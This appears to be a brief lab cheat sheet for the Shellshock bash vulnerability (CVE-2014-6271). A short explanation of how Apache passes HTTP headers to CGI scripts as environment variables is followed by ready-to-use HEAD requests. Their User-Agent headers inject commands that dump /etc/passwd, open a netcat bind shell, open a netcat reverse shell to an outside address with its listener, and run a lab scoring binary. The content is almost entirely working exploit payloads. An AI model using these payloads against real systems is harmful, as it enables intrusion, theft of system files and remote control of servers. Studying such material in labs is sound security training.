CVE-2014-6271
https://seclists.org/oss-sec/2014/q3/650


Apache needs to pass information to the CGI script. To do so, it uses environment variables.
Environment variables are available inside the CGI script.
It allows Apache to easily pass every headers (amongst other information) to the CGI.

If you have a HTTP header named Blah in your request,
you will have an environment variable named HTTP_BLAH available in your CGI.



HEAD /cgi-bin/status HTTP/1.1
User-Agent: () { :;}; echo $(</etc/passwd)
Host: ptl-392ad7d5-0e9e0682.libcurl.so
Connection: close


Bind shell

HEAD /cgi-bin/status HTTP/1.1
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
Host: ptl-392ad7d5-0e9e0682.libcurl.so
Connection: close


Reverse Shell

# nc -l -p 443

HEAD /cgi-bin/status HTTP/1.1
User-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh
Host: ptl-392ad7d5-0e9e0682.libcurl.so
Connection: close


Score

HEAD /cgi-bin/status HTTP/1.1
User-Agent: () { :;}; /usr/local/bin/score 2fdb31a2-ca58-4650-abfb-9406be061d69
Host: ptl-392ad7d5-0e9e0682.libcurl.so
Connection: close

